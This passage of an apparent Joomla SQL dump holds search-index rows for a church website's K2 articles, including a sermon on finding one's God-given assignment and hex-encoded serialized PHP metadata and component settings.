a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3630223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d36303a66726f6d2d6f75722d6661746865722d732d68656172742d30322d30382d32303138223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202831392f30382f3230313829223b733a31313a226465736372697074696f6e223b733a3934323a2220446561726c792042656c6f7665642c20492077616e7420746f2073686f7720796f7520746f64617920736f6d6520444f4ee280995453204f462054484520484f4c592053504952495420796f75206d7573742061766f696420617320796f7520454e54455220494e544f2054484520574f524c44204f462054484520484f4c59205350495249542e2054616b696e67206e6f7465206f662074686573652077696c6c206b65657020796f75207361666520617320796f752067726f7720696e20796f75722072656c6174696f6e7368697020776974682074686520486f6c79205370697269742e20312e20446f6e27742069676e6f72652048696d2e204f6e65206f662074686520776179732062792077686963682074686520486f6c792053706972697420636f6e7461637473207573206973207468726f75676820434f4e53545241494e5420616e6420524553545241494e542e2049676e6f72696e67207468697320636f6d6d756e69636174696f6e206f662074686520486f6c792053706972697420697320707265706172696e6720666f72206120667574757265206f66207061696e2e20436f6e73747261696e74206d65616e7320746f206d616b6520736f6d65626f647920646f20736f6d657468696e6720627920666f726365206f72206279207374726f6e672070657273756173696f6e2c20746861742069732c20736f6d657468696e672074686174206c696d697473206f6e65e28099732066726565646f6d206f6620616374696f6e2e20436f6e73747261696e742069732061207374726f6e6720696e6e657220707265737375726520746f20676f2061686561642e20536f6d652076657273696f6e73206f6620746865204269626c652072656e64657220636f6e73747261696e7420617320636f6d70656c2e205468657265666f72652c20697420697320706f737369626c6520666f7220796f7572207370697269742d6d616e20746f20636f6d70656c20796f7520746f20646f20736f6d657468696e672e20524553545241494e5420697320616e20657175616c6c79207374726f6e6720696e6e6572207072657373757265206e6f7420746f20676f2061686561642e20446f206e6f742069676e6f72652048696d207768656e65766572204865206272696e677320746865207369676e616c7320746f20796f752e20596f7520617265206f6e6c7920726566726573686564207768656e20796f7520646f2077686174207468652073706972697420636f6e73747261696e7320796f7520746f20646f2e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031382d30382d32342031353a30383a3239223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031382d30382d32342031353a30383a3239223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(306, 'index.php?option=com_k2&view=item&id=62', 'index.php?option=com_k2&view=item&id=62:living-the-divinely-assisted-life-part-2', 'Living the Divinely Assisted Life Part 2', ' I D E NTI F Y THE ASSIGNMENT FOR YOUR DESTINY God made you for a purpose. If God called you to be a professional that is what you are anointed for. We are all made different from one another, but every child of God is to serve the purpose of God. God made Esther beautifully different from every other girl of her time. For her to have become the queen of Persia and not deliver Israel would have been to miss the purpose of God for giving her the throne. Wrong discipleship comes in when people get to the place of destiny and they have wrong purposes there. Once you find your assignment in the Kingdom, settle down and do it. Whether you are a governor, a president, a prime minister, a senator, a businessman or a housewife, God has an assignment for you. As a housewife, God had an assignment for Mary to provide a womb for Jesus to be born. He had an assignment for Joseph, a businessman, to provide a home atmosphere where Jesus could grow up in the disciplines of the Jewish religion, so that He could enter the ministry of a prophet under the Old Testament and He could fulfill His calling. Every child of God must know the assignment God raised him/her for. For Esther, she had to become queen so as to be able to have the clout and authority to speak to the king to counter Haman’s plot and facilitate the salvation of the people of God. That was what Mordecai told her in the book of Esther 4:14: “ Yet who knows whether you have come to the kingdom for such a time as this?” Her being at the king’s palace was not accidental; it was a deliberate, purposeful, timed, designed arrival. When you get to where you are going, it’s a process of God and you will be able to trace your journey and how God guided your steps. DIVINE PROVISION FOR YOUR ASSIGNMENT Understand that while we are here on earth, we are on official duty. Don’t forget that. God can make your life comfortable for your assignment. It’s amazing how people think that God is interested in their suffering, but you musthave a balanced idea of what God planned for you. A sister who was in error once told me that God said I should give her ₦130,000 to buy land for her ministry. She said I should sell my car to do so and that God would give me a helicopter in return. You know that’s crazy! If I sold my car and I start to walk on foot, how does that help my ministry? Secondly, I was clear that my assignment at that time did not require a helicopter. I was using all my faith to fuel and service the car I had then, if I got a helicopter, where will I get money to pay the salary of the pilot and where will I park the helicopter? When you think about that, you know it was the devil that was speaking through that lady. But if my ministry requires a helicopter, God will send one. Whatever your assignment on the earth requires, that is what God funds. God funds the assignment He commits to your care. Ask yourself: Which of the things I am currently doing and labouring over is my divine assignment? Assignment is not the same as job. God will promote you at your job supernaturally and miraculously for your assignment, so you must find that assignment. If you don’t connect to assignment, there is no divine commitment to you. God is not just interested in making you wealthy, but He is concerned with the purpose for the wealth. God is not going to take money from the hand of a foolish sinner and put it in the hand of a foolish Christian. He displaced Vashti and put Esther there who was going to use that place correctly and when she was about to miss it, Mordecai said, “... maybe you have come to the kingdom for such a time as this....” Mordecai was in essence saying, “It means you have been prepared for this hour; this is the meaning to all your training. This is the reason why your father died and God ordered that I mentor you.” DIFFERENT ACCOUNTS T O KEEP God does not have to look at your bank account before he tells you to do something for him. If God is going to tell you to do something, he isgoing to look at what is in each of the accounts. These accounts were opened on your behalf but you may not be servicing those accounts, and they may be dormant. The devil has never been the problem of God’s people; it is the strength of our faith or the feebleness of our faith. You don’t have any problem really; you may need more faith or more wisdom somewhere but along these seven accounts you have to nurture and service them. O bedience Account: I have operated these account now for 35 years and in an official capacity that God called me and showed me his plan for me. This is his purpose for my life and in this 36th year, I have not knowingly disobeyed the directions of God except the one I’m not sure that God wants me to do but I have obeyed all. Our salvation is the manifestation of the obedience of Jesus Christ. Your obedience and disobedience can have generational consequences. All these accounts are opened, angels are recording, God is watching it, and once he tells us to do something, he gives us that instructions in those accounts. F aith Account: You cannot cast your knowledge beyond the level of faith you have. If your faith is low, you won’t cast your fear upon God; you will carry your care yourself. It takes faith to cast your care on the Lord. As your faith grows, the capacity to interact beyond your faith you do not see will be increasing. When your faith is low, you tend to interact with the people and problems you see and it is very important that we live the life of faith. Understand that when you got born again, certain critical changes took place and you must know how to manage those changes. W isdom Account: It was the wisdom account that Solomon had that gave him his victory; not every born again person is wise. Wisdom is ability to use knowledge to your advantage and you have that account. Rela t ionshi p Account: One of the marks of wisdom that you see in people’s life is how they handle relationships in their life. You must be able to recognizecritical relationships₦ whether it is small or big. Ability to recognize the people that belong to the past, to today and to tomorrow, and distinguish between them is very important because everybody in your life belongs to one of these three periods: yesterday, today and tomorrow. You have to learn how to handle relationships because there are some things that you do not have but another person that you know will have. How strong is your relationship with God? There are men that God will bring cross your path for different reasons and you have to be sensitive about that. Calling Account: You have an account of the calling before you were born. God called you as a spirit and put you in a body as a human body. Anointing Account: And then you are here to go with your calling an anointing. The anointing makes the calling easy and walkable. ', '2019-07-17 16:03:53', '1bfd96f227a6dd49e8a46ea0b16bfd4d', 1, 1, 1, '*', '2019-07-17 15:57:55', '0000-00-00 00:00:00', '2019-07-17 15:57:55', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223632223b733a353a22616c696173223b733a34303a226c6976696e672d7468652d646976696e656c792d61737369737465642d6c6966652d706172742d32223b733a373a2273756d6d617279223b733a373438343a223c703e3c7374726f6e673e493c2f7374726f6e673e3c7374726f6e673e443c2f7374726f6e673e3c7374726f6e673e453c2f7374726f6e673e3c7374726f6e673e4e54493c2f7374726f6e673e3c7374726f6e673e463c2f7374726f6e673e3c7374726f6e673e59205448452041535349474e4d454e5420464f5220594f55522044455354494e593c2f7374726f6e673e3c2f703e0d0a3c703e476f64266e6273703b206d61646520796f7520666f72206120707572706f73652e20496620476f64266e6273703b2063616c6c656420796f7520746f20626520612070726f66657373696f6e616c2074686174206973207768617420796f752061726520616e6f696e74656420666f722e2057652061726520616c6c266e6273703b6d61646520646966666572656e742066726f6d206f6e6520616e6f746865722c20627574206576657279206368696c64206f6620476f64206973266e6273703b746f2073657276652074686520707572706f7365206f6620476f642e20476f64206d616465204573746865722062656175746966756c6c7920646966666572656e742066726f6d206576657279206f74686572206769726c206f66206865722074696d652e20466f722068657220746f2068617665206265636f6d652074686520717565656e206f662050657273696120616e64206e6f742064656c697665722049737261656c20776f756c642068617665206265656e20746f206d6973732074686520707572706f7365206f6620476f6420666f7220676976696e672068657220746865207468726f6e652e2057726f6e67206469736369706c657368697020636f6d657320696e207768656e2070656f706c652067657420746f2074686520706c616365206f662064657374696e7920616e64207468657920686176652077726f6e6720707572706f7365732074686572652e3c2f703e0d0a3c703e4f6e636520796f752066696e6420796f75722061737369676e6d656e7420696e20746865204b696e67646f6d2c20736574746c6520646f776e20616e6420646f2069742e205768657468657220796f7520617265206120676f7665726e6f722c206120707265736964656e742c2061207072696d65206d696e69737465722c20612073656e61746f722c206120627573696e6573736d616e206f72206120686f757365776966652c20476f642068617320616e2061737369676e6d656e7420666f7220796f752e204173206120686f757365776966652c20476f642068616420616e2061737369676e6d656e7420666f72204d61727920746f2070726f76696465206120776f6d6220666f72204a6573757320746f20626520626f726e2e2048652068616420616e2061737369676e6d656e7420666f72204a6f736570682c206120627573696e6573736d616e2c20746f2070726f76696465206120686f6d652061746d6f737068657265207768657265204a6573757320636f756c642067726f7720757020696e20746865206469736369706c696e6573206f6620746865204a65776973682072656c6967696f6e2c20736f207468617420486520636f756c6420656e74657220746865206d696e6973747279206f6620612070726f7068657420756e64657220746865204f6c642054657374616d656e7420616e6420486520636f756c642066756c66696c6c204869732063616c6c696e672e204576657279206368696c64206f6620476f64206d757374206b6e6f77207468652061737369676e6d656e7420476f64207261697365642068696d2f68657220666f722e20466f72204573746865722c207368652068616420746f206265636f6d6520717565656e20736f20617320746f2062652061626c6520746f20686176652074686520636c6f757420616e6420617574686f7269747920746f20737065616b20746f20746865206b696e6720746f20636f756e7465722048616d616ee280997320706c6f7420616e6420666163696c6974617465207468652073616c766174696f6e206f66207468652070656f706c65206f6620476f642e2054686174207761732077686174204d6f72646563616920746f6c642068657220696e2074686520626f6f6b206f662045737468657220343a31343a20e2809c3c656d3e596574203c2f656d3e3c656d3e77686f206b6e6f7773207768657468657220796f75206861766520636f6d6520746f20746865206b696e67646f6d20266e6273703b666f72207375636820612074696d6520617320746869733fe2809d203c2f656d3e486572206265696e6720617420746865206b696e67e28099732070616c61636520776173206e6f74206163636964656e74616c3b2069742077617320612064656c696265726174652c20707572706f736566756c2c2074696d65642c2064657369676e6564206172726976616c2e205768656e20796f752067657420746f20776865726520796f752061726520676f696e672c206974e280997320612070726f63657373206f6620476f6420616e6420796f752077696c6c2062652061626c6520746f20747261636520796f7572206a6f75726e657920616e6420686f7720476f642067756964656420796f75722073746570732e3c2f703e0d0a3c703e3c7374726f6e673e444956494e452050524f564953494f4e20464f5220594f55522041535349474e4d454e543c2f7374726f6e673e3c2f703e0d0a3c703e556e6465727374616e642074686174207768696c65207765206172652068657265206f6e2065617274682c20776520617265206f6e206f6666696369616c20647574792e20446f6ee280997420666f7267657420746861742e20476f642063616e206d616b6520796f7572206c69666520636f6d666f727461626c6520666f7220796f75722061737369676e6d656e742e204974e280997320616d617a696e6720686f772070656f706c65207468696e6b207468617420476f6420697320696e746572657374656420696e20746865697220737566666572696e672c2062757420796f75206d757374206861766520612062616c616e6365642069646561206f66207768617420476f6420706c616e6e656420666f7220796f752e2041207369737465722077686f2077617320696e206572726f72206f6e636520746f6c64206d65207468617420476f64207361696420492073686f756c6420676976652068657220e282a63133302c30303020746f20627579206c616e6420666f7220686572206d696e69737472792e20536865207361696420492073686f756c642073656c6c206d792063617220746f20646f20736f20616e64207468617420476f6420776f756c642067697665206d6520612068656c69636f7074657220696e2072657475726e2e20596f75206b6e6f772074686174e2809973206372617a7921204966204920736f6c64206d792063617220616e64204920737461727420746f2077616c6b206f6e20666f6f742c20686f7720646f657320746861742068656c70206d79206d696e69737472793f3c2f703e0d0a3c703e5365636f6e646c792c20492077617320636c6561722074686174206d792061737369676e6d656e7420617420746861742074696d6520646964206e6f74207265717569726520612068656c69636f707465722e204920776173207573696e6720616c6c206d7920666169746820746f206675656c20616e6420736572766963652074686520636172204920686164207468656e2c206966204920676f7420612068656c69636f707465722c2077686572652077696c6c204920676574206d6f6e657920746f20706179207468652073616c617279206f66207468652070696c6f7420616e642077686572652077696c6c2049207061726b207468652068656c69636f707465723f205768656e20796f75207468696e6b2061626f757420746861742c20796f75206b6e6f77206974207761732074686520646576696c20746861742077617320737065616b696e67207468726f7567682074686174206c6164792e20427574206966206d79206d696e697374727920726571756972657320612068656c69636f707465722c20476f642077696c6c2073656e64206f6e652e20576861746576657220796f75722061737369676e6d656e74206f6e207468652065617274682072657175697265732c2074686174266e6273703b206973207768617420476f642066756e64732e20476f642066756e6473207468652061737369676e6d656e7420486520636f6d6d69747320746f20796f757220636172652e2041736b20796f757273656c663a205768696368206f6620746865207468696e6773204920616d2063757272656e746c7920646f696e6720616e64206c61626f7572696e67206f766572206973206d7920646976696e652061737369676e6d656e743f2041737369676e6d656e74206973206e6f74207468652073616d65206173206a6f622e20476f642077696c6c2070726f6d6f746520796f7520617420796f7572206a6f622073757065726e61747572616c6c7920616e64206d69726163756c6f75736c7920666f7220796f75722061737369676e6d656e742c20736f20796f75206d7573742066696e6420746861742061737369676e6d656e742e20496620796f7520646f6ee280997420636f6e6e65637420746f2061737369676e6d656e742c207468657265206973206e6f20646976696e6520636f6d6d69746d656e7420746f20796f752e3c2f703e0d0a3c703e3c2f703e0d0a3c703e476f64206973206e6f74206a75737420696e746572657374656420696e206d616b696e6720796f75207765616c7468792c206275742048652069733c2f703e0d0a3c703e636f6e6365726e656420776974682074686520707572706f736520666f7220746865207765616c74682e20476f64206973206e6f7420676f696e6720746f2074616b65206d6f6e65792066726f6d207468652068616e64206f66206120666f6f6c6973682073696e6e657220616e642070757420697420696e207468652068616e64206f66206120666f6f6c6973682043687269737469616e2e20486520646973706c616365642056617368746920616e6420707574204573746865722074686572652077686f2077617320676f696e6720746f20757365207468617420706c61636520636f72726563746c7920616e64207768656e20736865207761732061626f757420746f206d6973732069742c204d6f72646563616920736169642c20e2809c2e2e2e3c656d3e6d61796265203c2f656d3e3c656d3e796f75206861766520636f6d6520746f20746865206b696e67646f6d20666f72207375636820612074696d6520617320746869732e2e2e2ee2809d203c2f656d3e4d6f7264656361692077617320696e20657373656e636520736179696e672c20e2809c4974206d65616e7320796f752068617665206265656e20707265706172656420666f72207468697320686f75723b207468697320697320746865206d65616e696e6720746f20616c6c20796f757220747261696e696e672e20546869732069732074686520726561736f6e2077687920796f757220666174686572206469656420616e6420476f64206f72646572656420746861742049206d656e746f7220796f752ee2809d3c2f703e0d0a3c703e3c7374726f6e673e444946464552454e54204143434f554e5453203c2f7374726f6e673e3c7374726f6e673e543c2f7374726f6e673e3c7374726f6e673e4f204b4545503c2f7374726f6e673e3c2f703e0d0a3c703e476f6420646f6573206e6f74206861766520746f206c6f6f6b20617420796f75722062616e6b206163636f756e74206265666f72652068652074656c6c7320796f7520746f20646f20736f6d657468696e6720666f722068696d2e20496620476f6420697320676f696e6720746f2074656c6c20796f7520746f20646f20736f6d657468696e672c20686520697320676f696e6720746f206c6f6f6b206174207768617420697320696e2065616368206f6620746865206163636f756e74732e205468657365206163636f756e74732077657265206f70656e6564206f6e20796f757220626568616c662062757420796f75206d6179206e6f7420626520736572766963696e672074686f7365206163636f756e74732c20616e642074686579206d617920626520646f726d616e742e2054686520646576696c20686173206e65766572206265656e207468652070726f626c656d206f6620476f64e28099732070656f706c653b2069742069732074686520737472656e677468206f66206f7572206661697468206f722074686520666565626c656e657373206f66206f75722066616974682e20596f7520646f6ee2809974206861766520616e792070726f626c656d207265616c6c793b20796f75206d6179206e656564206d6f7265206661697468206f72206d6f726520776973646f6d20736f6d6577686572652062757420616c6f6e6720746865736520736576656e206163636f756e747320796f75206861766520746f206e75727475726520616e642073657276696365207468656d2e3c2f703e0d0a3c703e3c7374726f6e673e4f3c2f7374726f6e673e3c7374726f6e673e62656469656e6365204163636f756e743a203c2f7374726f6e673e492068617665206f70657261746564207468657365206163636f756e74206e6f7720666f72266e6273703b333520796561727320616e6420696e20616e206f6666696369616c206361706163697479207468617420476f642063616c6c6564206d6520616e642073686f776564206d652068697320706c616e20666f72206d652e20546869732069732068697320707572706f736520666f72206d79206c69666520616e6420696e2074686973203336746820796561722c20492068617665206e6f74206b6e6f77696e676c79206469736f62657965642074686520646972656374696f6e73266e6273703b6f6620476f642065786365707420746865206f6e652049e280996d206e6f742073757265207468617420476f642077616e7473206d6520746f20646f266e6273703b62757420492068617665206f626579656420616c6c2e204f75722073616c766174696f6e20697320746865206d616e69666573746174696f6e206f6620746865206f62656469656e6365206f66204a65737573204368726973742e20596f7572206f62656469656e636520616e64206469736f62656469656e63652063616e20686176652067656e65726174696f6e616c20636f6e73657175656e6365732e20416c6c207468657365206163636f756e747320617265206f70656e65642c20616e67656c7320617265207265636f7264696e672c20476f64206973207761746368696e672069742c20616e64206f6e63652068652074656c6c7320757320746f20646f20736f6d657468696e672c206865206769766573207573207468617420696e737472756374696f6e7320696e2074686f7365206163636f756e74732e3c2f703e0d0a3c703e3c7374726f6e673e463c2f7374726f6e673e3c7374726f6e673e61697468204163636f756e743a203c2f7374726f6e673e596f752063616e6e6f74206361737420796f7572206b6e6f776c65646765206265796f6e6420746865206c6576656c206f6620666169746820796f7520686176652e20496620796f7572206661697468206973206c6f772c20796f7520776f6ee2809974206361737420796f757220666561722075706f6e20476f643b20796f752077696c6c20636172727920796f7572206361726520796f757273656c662e2049742074616b657320666169746820746f206361737420796f75722063617265206f6e20746865204c6f72642e20417320796f75722066616974682067726f77732c2074686520636170616369747920746f20696e746572616374206265796f6e6420796f757220666169746820796f7520646f206e6f74207365652077696c6c20626520696e6372656173696e672e205768656e20796f7572206661697468206973206c6f772c20796f752074656e6420746f20696e7465726163742077697468207468652070656f706c6520616e642070726f626c656d7320796f752073656520616e64206974206973207665727920696d706f7274616e742074686174207765206c69766520746865206c696665206f662066616974682e20556e6465727374616e642074686174207768656e20796f7520676f7420626f726e20616761696e2c206365727461696e20637269746963616c206368616e67657320746f6f6b20706c61636520616e6420796f75206d757374206b6e6f7720686f7720746f206d616e6167652074686f7365206368616e6765732e3c2f703e0d0a3c703e3c7374726f6e673e573c2f7374726f6e673e3c7374726f6e673e6973646f6d204163636f756e743a203c2f7374726f6e673e4974207761732074686520776973646f6d206163636f756e74207468617420536f6c6f6d6f6e20686164207468617420676176652068696d2068697320766963746f72793b206e6f7420657665727920626f726e20616761696e20706572736f6e20697320776973652e20576973646f6d206973206162696c69747920746f20757365206b6e6f776c6564676520746f20796f757220616476616e7461676520616e6420796f7520686176652074686174206163636f756e742e3c2f703e0d0a3c703e3c7374726f6e673e52656c613c2f7374726f6e673e3c7374726f6e673e743c2f7374726f6e673e3c7374726f6e673e696f6e7368693c2f7374726f6e673e3c7374726f6e673e70204163636f756e743a203c2f7374726f6e673e4f6e65206f6620746865206d61726b73206f6620776973646f6d207468617420796f752073656520696e2070656f706c65e2809973206c69666520697320686f7720746865792068616e646c652072656c6174696f6e736869707320696e207468656972206c6966652e20596f75206d7573742062652061626c6520746f207265636f676e697a6520637269746963616c2072656c6174696f6e7368697073e282a6207768657468657220697420697320736d616c6c206f72206269672e204162696c69747920746f207265636f676e697a65207468652070656f706c6520746861742062656c6f6e6720746f2074686520706173742c20746f20746f64617920616e6420746f20746f6d6f72726f772c20616e642064697374696e6775697368206265747765656e207468656d206973207665727920696d706f7274616e742062656361757365206576657279626f647920696e20796f7572266e6273703b6c6966652062656c6f6e677320746f206f6e65206f6620746865736520746872656520706572696f64733a207965737465726461792c20746f64617920616e6420746f6d6f72726f772e20596f75206861766520746f206c6561726e20686f7720746f2068616e646c652072656c6174696f6e736869707320626563617573652074686572652061726520736f6d65207468696e67732074686174266e6273703b20796f7520646f206e6f7420686176652062757420616e6f7468657220706572736f6e207468617420796f75206b6e6f772077696c6c20686176652e20486f77207374726f6e6720697320796f75722072656c6174696f6e73686970207769746820476f643f20546865726520617265206d656e207468617420476f642077696c6c206272696e672063726f737320796f7572207061746820666f7220646966666572656e7420726561736f6e7320616e6420796f75206861766520746f2062652073656e7369746976652061626f757420746861742e3c2f703e0d0a3c703e3c7374726f6e673e43616c6c696e67204163636f756e743a203c2f7374726f6e673e596f75206861766520616e206163636f756e74206f66207468652063616c6c696e67206265666f726520796f75207765726520626f726e2e20476f642063616c6c656420796f7520617320612073706972697420616e642070757420796f7520696e206120626f647920617320612068756d616e20626f64792e3c2f703e0d0a3c703e3c7374726f6e673e416e6f696e74696e67204163636f756e743a203c2f7374726f6e673e416e64207468656e20796f7520617265206865726520746f20676f207769746820796f75722063616c6c696e6720616e20616e6f696e74696e672e2054686520616e6f696e74696e67206d616b6573207468652063616c6c696e67206561737920616e642077616c6b61626c652e3c2f703e223b733a343a22626f6479223b733a303a22223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31313a226d6f6469666965645f6279223b733a313a2230223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231